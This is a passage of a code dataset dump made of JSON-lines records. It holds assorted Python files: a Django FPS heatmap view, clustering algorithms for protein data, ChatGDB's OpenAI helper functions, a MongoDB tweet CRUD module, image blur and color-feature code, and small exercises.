date_time_str = lines[1].decode('utf-8').replace('/', '-')\n break\n phase_name, sub_phase_name = file.name.replace(\n '.csv', '').split('-')\n\n create_uploaded_stats_file(\n file, version, phase_name, sub_phase_name, date_time_str)\n return HttpResponse(f'Upload finished,time elapsed:{round(time.time() - start, 2)}')\n else:\n form = UploadStatsFileForm()\n return render(request, 'stats/upload.html', {'form': form, 'title': 'Add fps record'})\n\ndef get_phase_avg_fps(date, phase_name, sub_phase_name):\n avg_fps = StatFileRecord.objects.filter(\n phase_name=phase_name, sub_phase_name=sub_phase_name, date_time__date=date).values('avg_fps').aggregate(Avg('avg_fps'))\n if len(avg_fps.values()) > 0:\n return list(avg_fps.values())[0]\n else:\n return 0\n\n\ndef phase_fps_heatmap(request):\n phases = StatFileRecord.objects.values_list(\n 'phase_name', 'sub_phase_name').distinct()\n date_times = StatFileRecord.objects.values_list(\n 'date_time', flat=True).distinct()\n dates = sorted(list({item.date() for item in date_times}))\n if len(dates) == 0:\n return HttpResponse('No records for fps')\n # return HttpResponse(f'phase num:{len(phases)} date_time num:{len(dates)}\\n' + '\\n'.join( [f'{t[0]} {t[1]}' for t in list(phases)]), content_type=\"text/plain\")\n # print(f'phase num:{len(phases)} date_time num:{len(dates)}')\n # print('P100', '140_30_A_RobotM_CR_GuruBattle', get_phase_avg_fps(parse_datetime('2021-11-26 0:0:0'), 'P100', '140_30_A_RobotM_CR_GuruBattle'))\n\n latest_date = dates[-1]\n latest_fps_list = []\n for phase_index, phase_info in enumerate(phases):\n latest_fps_list.append((phase_info[0], phase_info[1], get_phase_avg_fps(latest_date, phase_info[0], phase_info[1])))\n latest_fps_list.sort(key=lambda x: x[2], reverse=True)\n\n fps_datas = []\n for date_index, date in enumerate(dates):\n for phase_index, phase_info in enumerate(latest_fps_list):\n fps_datas.append([date_index, phase_index, round(get_phase_avg_fps(date, phase_info[0], phase_info[1]), 2)])\n c = (\n HeatMap()\n .add_xaxis(dates)\n .add_yaxis(\n series_name=\"phases\", \n yaxis_data=[f'{t[0]} {t[1]}' for t in latest_fps_list], \n value=fps_datas,\n label_opts=opts.LabelOpts(\n is_show=True, color=\"#fff\", position=\"inside\"\n ), \n )\n .set_global_opts(\n legend_opts=opts.LegendOpts(is_show=False),\n title_opts=opts.TitleOpts(title=\"FPS HeatMap\"),\n yaxis_opts=opts.AxisOpts(axislabel_opts={\"interval\":\"0\"}),\n visualmap_opts=opts.VisualMapOpts(\n min_=0, max_=30, is_calculable=True, orient=\"horizontal\", pos_left=\"center\",\n range_color=[\"#d94e5d\"]* 28 + [\"#eac763\", \"#50a3ba\"]\n ),\n )\n )\n\n grid = Grid(init_opts=opts.InitOpts(width=\"1200px\", height=\"800px\"))\n grid.add(c, grid_opts=opts.GridOpts(pos_left=260))\n return HttpResponse(grid.render_embed())\n\n","repo_name":"superzscy/django_data_visualization_proj","sub_path":"stats/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":16454,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1387503094","text":"import heapq\nimport sys\ninput = sys.stdin.readline\n\nn, m = map(int, input().split())\ndata = list(map(int, input().split()))\nanswer = 0\nheapq.heapify(data)\nfor _ in range(m):\n first = heapq.heappop(data)\n seoncd = heapq.heappop(data)\n heapq.heappush(data, first + seoncd)\n heapq.heappush(data, first + seoncd)\n\nprint(sum(data))","repo_name":"Dltmd202/BOJ-ProblemSlove","sub_path":"python/15903/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"14532513656","text":"# names=['Aung Aung','Kyaw Kyaw','Su Su','Ma Ma'];\n\n# for loop\n# for name in names :\n# if name=='Su Su' :\n# print(f'{name} is constructor.');\n# break\n# else :\n# print(f'{name} is student.');\n\n\n#while loop\nnum=0\nwhile num<10 :\n if num>5 :\n break;\n if num%2 == 0 :\n print(f'{num} is even number.');\n else :\n print(f'{num} is odd number.');\n num+=1;","repo_name":"NangSengHarn/python-learning","sub_path":"loops.py","file_name":"loops.py","file_ext":"py","file_size_in_byte":411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1570234803","text":"\"\"\" Evaluating the effectiveness of a variety of clustering algorithms \n\"\"\"\n__author__ = \"Rohan Pandit\" \n\nimport sys\nfrom itertools import cycle\nfrom time import time\nimport os\n\nimport numpy as np\nfrom matplotlib import pyplot as plt\nfrom scipy.constants import k as k_b\nfrom sklearn import cluster\nfrom sklearn.neighbors import BallTree\nfrom sklearn.utils import extmath\nfrom sklearn.metrics.pairwise import euclidean_distances\nfrom sklearn.neighbors import NearestNeighbors\nfrom sklearn.cluster._dbscan_inner import dbscan_inner\n\nfilename = sys.argv[1]\n\nK_MEANS \t\t= True\nAFFINITY_PROP \t= False\nMEAN_SHIFT \t\t= True\nAGGLOMERATIVE \t= True\nDBSCAN \t\t\t= True\n\n#Example Usage: python cluster.py 5000_SOD1\ndef main():\n\t####################### Loading Files ##########################\n\tpdb_name = filename.split(\"_\")[0]\n\n\talgorithms = ['k_means', 'affinity_prop', 'affinity_prop_eps', \n\t\t\t\t 'mean_shift', 'mean_shift_eps', 'agglomerative',\n\t\t\t\t 'DBSCAN', 'DBSCAN_eps', ]\n\tfor name in algorithms:\n\t\tif not os.path.exists(\"output/%s/%s\"%(filename, name)):\t\n\t\t\tos.makedirs(\"output/%s/%s\"%(filename, name))\n\n\tprojections = np.load(\"output/%s/projections.npy\" % filename)[:, :2]\n\tRMSDs = np.load(\"output/%s/RMSD.npy\" % filename)\n\tepsilons = np.load(\"output/%s/epsilons.npy\" % filename)\n\teigenvals = np.load(\"output/%s/eigenvals.npy\" % filename)\n\n\t########################## K-Means ############################\n\tif K_MEANS:\n\t\tt0 = time()\n\t\tprint(\"Starting K-Means for\", filename)\n\n\t\tk = cluster.KMeans(n_clusters=10, n_jobs=-1).fit(RMSDs)\n\n\t\tnp.save(\"output/%s/k_means/cluster_centers\"%filename, k.cluster_centers_)\n\t\tnp.save(\"output/%s/k_means/labels\"%filename, k.labels_)\n\n\t\tprint(\"num clusters: \", k.cluster_centers_.shape[0])\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\t\t#cluster_plot(projections, labels)\n\n\t################### Affinity Propagation #######################\n\tif AFFINITY_PROP:\n\t\tt0 = time()\n\t\tprint(\"Starting Affinity Propagation for\", filename)\n\n\t\taf = cluster.AffinityPropagation(verbose=True, affinity='precomputed').fit(RMSDs)\n\n\t\tnp.save(\"output/%s/affinity_prop/cluster_centers\"%filename, af.cluster_centers_)\n\t\tnp.save(\"output/%s/affinity_prop/labels\"%filename, af.labels_)\n\n\t\tprint(\"num clusters: \", af.cluster_centers_.shape[0])\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t################ Affinity Propagation with Epsilons ###############\n\tif AFFINITY_PROP:\n\t\tt0 = time()\n\t\tprint(\"Starting Affinity Propagation with epsilons for\", filename)\n\n\t\taf = cluster.AffinityPropagation(preference=epsilons, verbose=True, \n\t\t\t\t\t\t\t\t\t\t\taffinity='precomputed').fit(RMSDs)\n\n\t\tnp.save(\"output/%s/affinity_prop_eps/cluster_centers\"%filename, af.cluster_centers_)\n\t\tnp.save(\"output/%s/affinity_prop_eps/labels\"%filename, af.labels_)\n\n\t\tprint(\"num clusters: \", cluster_centers.shape[0])\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t############################ Mean Shift #############################\n\tif MEAN_SHIFT:\n\t\tt0 = time()\n\t\tprint(\"Starting Mean Shift for\", filename)\n\n\t\tms = cluster.MeanShift(bandwidth=np.mean(RMSDs), bin_seeding=False).fit(RMSDs)\n\n\t\tnp.save(\"output/%s/mean_shift/cluster_centers\"%filename, ms.cluster_centers_)\n\t\tnp.save(\"output/%s/mean_shift/labels\"%filename, ms.labels_)\n\n\t\tprint(\"num clusters: \", ms.cluster_centers_.shape[0])\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t####################### Mean Shift with Epsilons #########################\n\tif MEAN_SHIFT:\n\t\tt0 = time()\n\t\tprint(\"Starting Mean Shift with epsilons for\", filename)\n\n\t\tcluster_centers, labels = variable_bw_mean_shift(RMSDs, bandwidth_array=epsilons)\n\n\t\tnp.save(\"output/%s/mean_shift_eps/cluster_centers\"%filename, cluster_centers)\n\t\tnp.save(\"output/%s/mean_shift_eps/labels\"%filename, labels)\n\n\t\tprint(\"num clusters: \", cluster_centers.shape[0])\n\t\tprint(\"num clusters: \", len(set(labels)))\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t##### Density-Based Spatial Clustering of Applications with Noise (DBSCAN) ####\n\tif DBSCAN:\n\t\tt0 = time()\n\t\tprint(\"Starting DBSCAN for\", filename)\n\n\t\td = cluster.DBSCAN(eps=np.mean(RMSDs), metric='precomputed',\n\t\t\t\t\t\t\talgorithm='ball_tree', min_samples=3).fit(RMSDs)\n\n\t\tnp.save(\"output/%s/DBSCAN/cluster_centers\"%filename, d.components_)\n\t\tnp.save(\"output/%s/DBSCAN/labels\"%filename, d.labels_)\n\n\t\tprint(\"num clusters: \", len(set(d.labels_)))\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n\t############################ DBSCAN with Epsilons ###########################\n\tif DBSCAN:\n\t\tt0 = time()\n\t\tprint(\"Starting DBSCAN with epsilons for\", filename)\n\n\t\tcluster_centers, labels = variable_eps_DBSCAN(RMSDs, epsilons, min_samples=2)\n\n\t\tnp.save(\"output/%s/DBSCAN_eps/cluster_centers\"%filename, cluster_centers)\n\t\tnp.save(\"output/%s/DBSCAN_eps/labels\"%filename, labels)\n\n\t\tprint(d.labels_)\n\t\tprint(np.unique(d.labels_).shape[0])\n\t\tprint(\"num clusters: \", len(set(d.labels_)))\n\t\tprint(\"time elapsed: %s \\n\"%(time() - t0))\n\n########################## Clustering Algorithms #######################\n\ndef variable_bw_mean_shift(X, bandwidth_array, seeds=None, max_iterations=300):\n\t\"\"\"Variable bandwidth mean shift with gaussian kernel\n\n\tParameters\n\t----------\n\tX : array-like, shape=[n_samples, n_features]\n\t\tInput data.\n\n\tbandwidth : array[float], shape=[n_samples]\n\t\tKernel bandwidth.\n\n\tseeds : array[float, float], shape=(n_seeds, n_features), optional\n\t\tPoint used as initial kernel locations. Default is\n\t\tsetting each point in input data as a seed.\n\n\tmax_iter : int, default 300\n\t\tMaximum number of iterations, per seed point before the clustering\n\t\toperation terminates (for that seed point), if has not converged yet.\n\n\tReturns\n\t-------\n\tcluster_centers : array, shape=[n_clusters, n_features]\n\t\tCoordinates of cluster centers.\n\n\tlabels : array, shape=[n_samples]\n\t\tCluster labels for each point.\n\n\tNotes\n\t-----\n\tCode adapted from scikit-learn library.\n\n\t\"\"\"\n\n\tif not seeds:\n\t\tseeds = X \n\n\tn_points, n_features = X.shape\n\tstop_thresh = 1e-3 * np.mean(bandwidth_array) # when mean has converged\n\tcenter_intensity_dict = {}\n\tcluster_centers = []\n\tball_tree = BallTree(X) # to efficiently look up nearby points\n\n\tdef gaussian_kernel(x, points, bandwidth):\n\t\tdistances = euclidean_distances(points, x)\n\t\tweights = np.exp(-1 * (distances ** 2 / bandwidth ** 2))\n\t\treturn np.sum(points * weights, axis=0) / np.sum(weights)\n\n\t# For each seed, climb gradient until convergence or max_iterations \n\tfor i, weighted_mean in enumerate(seeds):\n\t\tcompleted_iterations = 0\n\t\twhile True:\n\t\t\tpoints_within = X[ball_tree.query_radius([weighted_mean], bandwidth_array[i])[0]]\n\t\t\told_mean = weighted_mean # save the old mean \n\t\t\tweighted_mean = gaussian_kernel(old_mean, points_within, bandwidth_array[i])\n\t\t\tconverged = extmath.norm(weighted_mean - old_mean) < stop_thresh\n\n\t\t\tif converged or completed_iterations == max_iterations:\n\t\t\t\tif completed_iterations == max_iterations:\n\t\t\t\t\tprint(\"reached max iterations\")\n\t\t\t\tcluster_centers.append(weighted_mean)\n\t\t\t\tcenter_intensity_dict[tuple(weighted_mean)] = len(points_within)\n\t\t\t\tbreak\n\t\t\t\t \n\t\t\tcompleted_iterations += 1\n\n\t# POST PROCESSING: remove near duplicate points\n\t# If the distance between two kernels is less than the bandwidth,\n\t# then we have to remove one because it is a duplicate. Remove the\n\t# one with fewer points.\n\tsorted_by_intensity = sorted(center_intensity_dict.items(),\n\t\t\t\t\t\t\t\t key=lambda tup: tup[1], reverse=True)\n\tsorted_centers = np.array([tup[0] for tup in sorted_by_intensity])\n\tunique = np.ones(len(sorted_centers), dtype=np.bool)\n\tball_tree = BallTree(sorted_centers)\n\n\tfor i, center in enumerate(sorted_centers):\n\t\tif unique[i]:\n\t\t\tneighbor_idxs = ball_tree.query_radius([center], np.mean(bandwidth_array))[0]\n\t\t\tunique[neighbor_idxs] = 0\n\t\t\tunique[i] = 1 # leave the current point as unique\n\tcluster_centers = sorted_centers[unique]\n\n\t# ASSIGN LABELS: a point belongs to the cluster that it is closest to\n\tnbrs = NearestNeighbors(n_neighbors=1, algorithm='ball_tree').fit(cluster_centers)\n\tlabels = np.zeros(n_points, dtype=np.int)\n\tdistances, idxs = nbrs.kneighbors(X)\n\tlabels = idxs.flatten()\n\n\treturn cluster_centers, labels\n\ndef variable_eps_DBSCAN(X, eps_array, min_samples=5):\n\t\"\"\" Density-Based Spatial Clustering of Applications with Noise\n\n\tParameters\n\t----------\n\tX : array[float, float], shape=(n_samples,n_features)\n\t\tSimilarity matrix\n\n\teps_array : array[float], shape=(n_samples)\n\t\tThe maximum distance between two points for them to be considered \n\t\tto be in the same neighborhood, applied locally.\n\n\tReturns\n\t--------\n\tcluster_centers : array, shape=[n_clusters, n_features]\n\t\tCoordinates of cluster centers.\n\n\tlabels : array, shape=[n_samples]\n\t\tCluster labels for each point.\n\n\tNotes\n\t-----\n\tCode adapted from scikit-learn library \n\t\"\"\"\n\t# Calculate neighborhood for all samples. This leaves the original point\n\t# in, which needs to be considered later (i.e. point i is in the\n\t# neighborhood of point i. While True, its useless information)\n\tneighborhoods = np.array([np.where(x <= eps_array[i])[0] for i, x in enumerate(X)])\n\n\tn_neighbors = np.array([len(neighbors) for neighbors in neighborhoods])\n\n\t# Initially, all samples are noise.\n\tlabels = -np.ones(X.shape[0], dtype=np.intp)\n\n\t# A list of all core samples found.\n\tcore_samples = np.asarray(n_neighbors >= min_samples, dtype=np.uint8)\n\tdbscan_inner(core_samples, neighborhoods, labels)\n\n\treturn np.where(core_samples)[0], labels\n\n\n######################### Plotting ########################\n\ndef cluster_plot(data, labels):\n\tcolors = cycle('bgrcmyk')\n\tnum_clusters = len(np.unique(labels))\n\tprint(\"num clusters: \", num_clusters)\n\n\tfor i in range(num_clusters):\n\t\tto_plot = data[ np.where(labels == i) ]\n\t\tx_plot = to_plot[:, 0]\n\t\ty_plot = to_plot[:, 1]\n\t\tplt.scatter(x_plot, y_plot, c=next(colors))\n\n\tplot(data)\n\ndef plot(data):\n\tx = data[:, 0]\n\ty = data[:, 1]\n\tplt.axis([min(x), max(x),min(y),max(y)])\n\tplt.xlabel(\"DC1\")\n\tplt.ylabel(\"DC2\")\n\tplt.grid()\n\tplt.show()\n\tplt.savefig(\"%s_plot.png\"%filename, transparent=True, \n\t\t\t\tbbox_inches='tight', figsize=(3,3), dpi=300)\n\nif __name__ == \"__main__\":\n\tmain()\n\n\n# def calcProb(energy, temp=300):\n# \treturn np.exp(-energy / (k_b * temp))\n\n# def calcEntropy(num_states, probs):\n# \t\"\"\"\n# \t\tNotes\n# \t\t-----\n# \t\t\tDerived using stirling approximation of formal \n# \t\t\tdefinition of entropy.\n# \t\t\t..math -K_b N \\sum_{k=1}^{s}p_k \\ln p_k\n# \t\"\"\"\n# \treturn -k_b * num_states * np.sum(probs * np.log(probs))\n\n","repo_name":"rohanp/LDFMap","sub_path":"cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":10555,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"48"} +{"seq_id":"5207609904","text":"import json\nfrom posixpath import dirname\nfrom urllib.error import HTTPError, URLError\nfrom urllib.request import Request, urlopen\nfrom os.path import abspath, dirname\nfrom inspect import getfile, currentframe\n\n\ndef get_key():\n \"\"\"Gets api key from secret file\n\n Returns: (str) api key\n \"\"\"\n key = []\n secret = \"\"\n # gets path of this script - OS independent\n path = dirname(abspath(getfile(currentframe()))) + \"/.secret.txt\"\n try:\n # get appropriate api key\n with open(path) as f:\n key = [line.strip() for line in f]\n for k in key:\n if k.startswith(\"OPENAI_KEY\"):\n secret = k.split('\"')[1::2]\n except FileNotFoundError:\n print(\"Could not find api key. Please make sure you've run the CLI \"\n \"tool and set up your model\")\n quit(\"Exiting...\")\n\n return secret[0]\n\n\ndef get_model():\n \"\"\"Gets model from model file\n\n Returns: (str) model\n \"\"\"\n model = []\n model_name = \"\"\n # gets path of this script - OS independent\n path = dirname(abspath(getfile(currentframe()))) + \"/.model.txt\"\n try:\n # get appropriate api key\n with open(path) as f:\n model = [line.strip() for line in f]\n for m in model:\n if m.startswith(\"MODEL\"):\n model_name = m.split('\"')[1::2]\n except FileNotFoundError:\n print(\"Could not find model. Please make sure you've run the CLI \"\n \"tool and set up your model\")\n quit(\"Exiting...\")\n\n return model_name[0]\n\n\ndef make_request(url, headers=None, data=None):\n \"\"\"Makes API request\n\n Params:\n url (str): url to make request to\n headers (dict, optional): headers to send with request. Defaults to None.\n data (bytes, optional): data to send with request. Defaults to None.\n \"\"\"\n request = Request(url, headers=headers or {}, data=data)\n try:\n with urlopen(request, timeout=10) as response:\n return response.read(), response\n except HTTPError as error:\n print(error.status, error.reason)\n quit(\"Exiting...\")\n except URLError as error:\n print(error.reason)\n quit(\"Exiting...\")\n except TimeoutError:\n print(\"Request timed out\")\n quit(\"Exiting...\")\n\n\ndef chat_help():\n \"\"\"Prints help message for all available commands\"\"\"\n print(\n \"ChatGDB is a python script that defines some extra helpful GDB and \"\n \"LLDB commands. Before use, be sure to set up your api key using the \"\n \"CLI tool. The commands are as follows:\\n\\n\"\n \"chat: This command is used to generate GDB/LLDB commands based on plain \"\n \"English input. For example, 'chat stop my code at line 7' will \"\n \"generate the GDB command 'break 7'. Remember that in LLDB, many \"\n \"commands require filename information as well.\\n\\n\"\n \"explain: This command is used to generate explanations for either \"\n \"the previous command or a user query. 'explain' with \"\n \"no arguments will generate an explanation for the previous command \"\n \"but typing a query after will generate an answer for it.\\n\\n\")\n\n\nHEADERS = {\n \"Authorization\": \"Bearer \" + get_key(),\n \"Content-Type\": \"application/json\"\n}\nURL = \"https://api.openai.com/v1/chat/completions\"\n\n\ndef explain_helper(prev_command, command, prompt):\n \"\"\"Generates explanation for either the previous command or a user query\n\n Params:\n prev_command (str): previous command\n command (str): user query\n prompt (str): prompt to use for explanation\n \"\"\"\n question = prompt + prev_command if command == \"\" else command\n data = {\"model\": get_model(),\n \"messages\": [{\"role\": \"user\",\n \"content\": question}]}\n body, response = make_request(URL, HEADERS, data=bytes(json.dumps(data),\n encoding=\"utf-8\"))\n body = json.loads(body)\n explanation = body['choices'][0]['message']['content']\n print(explanation)\n\n\ndef chat_helper(command, prompt):\n \"\"\"Generates GDB/LLDB command based on user input\n\n Params:\n command (str): user input\n prompt (str): prompt to use for command generation\n \"\"\"\n data = {\"model\": get_model(),\n \"messages\": [{\"role\": \"user\",\n \"content\": prompt + command}]}\n\n body, response = make_request(URL, HEADERS, data=bytes(json.dumps(data),\n encoding=\"utf-8\"))\n body = json.loads(body)\n command = body['choices'][0]['message']['content']\n print(command)\n # the first is technically also the previous command\n return command, command\n","repo_name":"pgosar/ChatGDB","sub_path":"chatgdb/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4706,"program_lang":"python","lang":"en","doc_type":"code","stars":882,"dataset":"github-code","pt":"48"} +{"seq_id":"25361729974","text":"# from flask_script import Manager\nfrom controller import create_app\n\n# 创建APP对象\napp = create_app('dev')\n# # 创建脚本管理\n# mgr = Manager(app)\n\n\nif __name__ == '__main__':\n # mgr.run()\n app.run(threaded=True, host=\"0.0.0.0\")\n\n","repo_name":"Kr1s77/flask-video-streaming-recorder","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":245,"program_lang":"python","lang":"en","doc_type":"code","stars":219,"dataset":"github-code","pt":"48"} +{"seq_id":"5864725651","text":"\"\"\"\nSimple scenario that wraps the node.form of an artificial within square brackets\nif it isn't already wrapped\n\"\"\"\n\nfrom udapi.core.block import Block\n\nclass WrapArtificials(Block):\n\n def process_node(self, node):\n if node.misc['NodeType'] == 'Artificial':\n if not node.form.startswith('['):\n node.form = f'[{node.form}]'\n","repo_name":"francescomambrini/Udapi_AGLDT","sub_path":"udapi_agldt/util/wrapartificials.py","file_name":"wrapartificials.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"41160355671","text":"import motor.motor_asyncio\nfrom bson.objectid import ObjectId\nfrom decouple import config\n\nMONGO_DETAILS = config('MONGO_DETAILS')\n\nclient = motor.motor_asyncio.AsyncIOMotorClient(MONGO_DETAILS)\n\ndatabase = client.mongoDB\n\ntweet_coll = database.get_collection(\"tweet_collection\")\n\n\n# helpers\n\ndef tweet_helper(tweet) -> dict:\n return {\n \"_id\": str(tweet[\"_id\"]),\n \"tweet\": tweet[\"tweet\"],\n \"created_at\": tweet[\"created_at\"],\n }\n\n\n# Retrieve all tweets present in the database\nasync def retrieve_tweets():\n tweets = []\n async for tweet in tweet_coll.find():\n tweets.append(tweet_helper(tweet))\n return tweets\n\n\n# Add a new tweet into to the database\nasync def add_tweet(tweet_data: dict) -> dict:\n new_tweet = await tweet_coll.insert_one(tweet_data)\n return tweet_helper(tweet_data)\n\n\n# Retrieve a tweet with a matching ID\nasync def retrieve_tweet(id: str) -> dict:\n tweet = await tweet_coll.find_one({\"_id\": ObjectId(id)})\n if tweet:\n return tweet_helper(tweet)\n\n# Delete a tweet from the database\nasync def delete_tweet(id: str):\n tweet = await tweet_coll.find_one({\"_id\": ObjectId(id)})\n if tweet:\n await tweet_coll.delete_one({\"_id\": ObjectId(id)})\n return True\n return False\n\n# Update a tweet with a matching ID\nasync def update_tweet(id: str, data: dict):\n # Return false if an empty request body is sent.\n if len(data) < 1:\n return False\n tweet = await tweet_coll.find_one({\"_id\": ObjectId(id)})\n if tweet:\n updated_tweet = await tweet_coll.update_one(\n {\"_id\": ObjectId(id)}, {\"$set\": data}\n )\n if updated_tweet:\n return True\n return False\n","repo_name":"Jeromeschmidt/Tweet-gen-fastAPI","sub_path":"app/core/database/db.py","file_name":"db.py","file_ext":"py","file_size_in_byte":1701,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"17518575049","text":"import numpy as np\nimport cv2\nimport os.path\nimport sys\n\nDIR_PATH = os.path.join(os.path.dirname(__file__), '..')\nsys.path.append(DIR_PATH)\n\nfrom utils.prepare_data import read_image, write_image\nfrom Convolution.convolution import Convolution\n\ndef gauss2D(shape=(3,3),sigma= 3):\n \"\"\"\n 2D gaussian mask\n fspecial('gaussian',[shape],[sigma])\n \"\"\"\n try:\n m, n = [(x - 1.) / 2. for x in shape]\n y, x = np.ogrid[-m:m+1,-n:n+1]\n\n height = np.exp( -(x*x + y*y) / (2.*sigma*sigma) )\n height[ height < np.finfo(height.dtype).eps*height.max() ] = 0\n\n sum_height = np.sum(height)\n if sum_height != 0:\n height /= sum_height\n\n return height\n except EOFError as e:\n raise(e)\n\nclass Blur:\n \"\"\"\n Blur is class that can blur image\n Mean blur has parameters: mode = 1\n Gaussian blur has parameters: mode = 2\n \"\"\"\n def makeKernel(self, mode: int):\n try:\n if mode == 1:\n kernel = np.array([[1.0, 1.0, 1.0], [1.0, 1.0, 1.0], [1.0, 1.0, 1.0]]) /9\n elif mode == 2:\n kernel = np.array(gauss2D())\n else:\n kernel = None\n\n return kernel\n except EOFError as e:\n raise(e)\n\n def __init__(self, image, mode: int in [1, 2]):\n \"\"\"\n path: where is image in directory,\n mode: 1 (mean blur), 2 (gaussian blur)\n \"\"\"\n self.kernel = self.makeKernel(mode)\n self.image = image\n self.items = Convolution(self.kernel, self.image).items\n\nif __name__ == '__main__':\n print(\"Read image from path\")\n image = read_image(os.path.join(DIR_PATH+'/data/lena.png'), 1)\n blur_image = Blur(image, 1).items\n print(\"Write blur image\")\n write_image(os.path.join(DIR_PATH+'/data/blur-lena.png'), 1, blur_image)\n pass\n \n","repo_name":"truongcntn2017/ImageProcessing","sub_path":"Blur/blur.py","file_name":"blur.py","file_ext":"py","file_size_in_byte":1731,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"48"} +{"seq_id":"28351202297","text":"from features import AbstractFeature\nfrom visualize import ImagePlot\nfrom skimage.measure import regionprops, label\nfrom skimage import exposure, transform\nimport numpy as np\n\n\nclass ColorFeature(AbstractFeature):\n def process(self, img):\n # Extract blue regions\n rgb2yuv = np.array([[0.299, 0.587, 0.114], [-0.14713, -0.28886, 0.436], [0.615, -0.51499, -0.10001]])\n yuv = self.rescale_values(np.dot(img.image, rgb2yuv.T))\n white_img = self.extract_color(yuv[:, :, 0])\n red_img = self.extract_color(yuv[:, :, 2])\n blue_img = self.extract_color(yuv[:, :, 1])\n black_img = self.extract_color(1 - yuv[:, :, 0])\n size = min(img.image.shape[0], img.image.shape[1])\n ratio_img = transform.resize(img.image, [size, size])\n # RED WHITE OVERLAP\n overlap = red_img * white_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if np.abs(RGB_avg[0] - RGB_avg[1]) <= 0.2 and np.abs(RGB_avg[0] - RGB_avg[2]) <= 0.2:\n red_img -= overlap\n else:\n white_img -= overlap\n # BLUE WHITE OVERLAP\n overlap = blue_img * white_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if np.abs(RGB_avg[0] - RGB_avg[1]) <= 0.2 and np.abs(RGB_avg[0] - RGB_avg[2]) <= 0.2:\n blue_img -= overlap\n else:\n white_img -= overlap\n # RED BLACK OVERLAP\n overlap = red_img * black_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if np.abs(RGB_avg[0] - RGB_avg[1]) <= 0.2 and np.abs(RGB_avg[0] - RGB_avg[2]) <= 0.2:\n red_img -= overlap\n else:\n black_img -= overlap\n # BLUE BLACK OVERLAP\n overlap = blue_img * black_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if np.abs(RGB_avg[0] - RGB_avg[1]) <= 0.2 and np.abs(RGB_avg[0] - RGB_avg[2]) <= 0.2:\n blue_img -= overlap\n else:\n black_img -= overlap\n # RED BLUE OVERLAP\n overlap = blue_img * red_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if RGB_avg[0] - RGB_avg[2] > 0:\n blue_img -= overlap\n else:\n red_img -= overlap\n # WHITE BLACK OVERLAP\n overlap = black_img * white_img\n if np.sum(overlap) > 0:\n RGB_avg = self.relative_proportions(overlap, ratio_img)\n if (RGB_avg[0] + RGB_avg[1] + RGB_avg[2]) >= 0.5 * 3:\n white_img -= overlap\n else:\n black_img -= overlap\n return [np.mean(red_img), np.mean(blue_img), np.mean(black_img), np.mean(white_img)]\n\n def rescale_values(self, img):\n img[:, :, 1] = (img[:, :, 1] + 0.436)/(0.436 * 2)\n img[:, :, 2] = (img[:, :, 2] + 0.615)/(0.615 * 2)\n return img\n\n def relative_proportions(self, bw_img, img):\n sum = np.sum(bw_img)\n RGB_avg = [0, 0, 0]\n for i in range(len(RGB_avg)):\n mult_img = bw_img * img[:, :, i]\n RGB_avg[i] = np.sum(mult_img) / sum\n return RGB_avg / RGB_avg[0] # Normalize\n\n def extract_color(self, img, show=False):\n size = min(img.shape[0], img.shape[1])\n ratio_img = transform.resize(img, [size, size])\n width, height = ratio_img.shape\n # if exposure.is_low_contrast(ratio_img, fraction_threshold=0.45):\n ratio_img = exposure.equalize_hist(ratio_img)\n # gray_img *= (im.image[:, :, 0] > 150) * (im.image[:, :, 1] > 150) * (im.image[:, :, 2] > 150)\n # Find an appropriate threshold in order to extract white-like regions\n min_threshold = np.amin(ratio_img)\n max_threshold = np.amax(ratio_img)\n value_range = (max_threshold - min_threshold)\n threshold = value_range * 0.5 + min_threshold\n props = []\n max_iter = 1\n while (len(props) <= 2 or len(props) >= 10) and max_iter < 1000:\n # Filtered white image\n filtered_img = ratio_img > threshold\n # Divide in regions\n labeled_img = label(filtered_img) + 1\n # Filter out largest white region\n mult_img = np.multiply(labeled_img, filtered_img) # only whitish regions are considered\n props = regionprops(mult_img)\n props = [region for region in props if region.area > 0.01 * width * height]\n # Adjust threshold boundaries and threshold\n too_less_regions = len(props) <= 2\n min_threshold = threshold if too_less_regions else min_threshold\n max_threshold = threshold if not too_less_regions else max_threshold\n threshold = threshold + value_range * 0.01 if too_less_regions else threshold - value_range * 0.01\n max_iter += 1\n # Extract largest white-like region\n # print(\"Threshold: %.2f\" % threshold)\n largest_region_img = np.zeros_like(ratio_img)\n if len(props) == 0:\n return largest_region_img\n max_region_coords = props[np.argmax([region.area for region in props])].coords\n largest_region_img[max_region_coords[:, 0], max_region_coords[:, 1]] = 1\n # Exclude white regions on the border\n excluded_border_img = np.ones_like(ratio_img)\n border_region_coords = np.array([coord.tolist() for coords in\n [region.coords for region in props if 0 in region.coords or\n width - 1 in region.coords[:, 0] or height - 1 in region.coords[:, 1]]\n for coord in coords])\n if 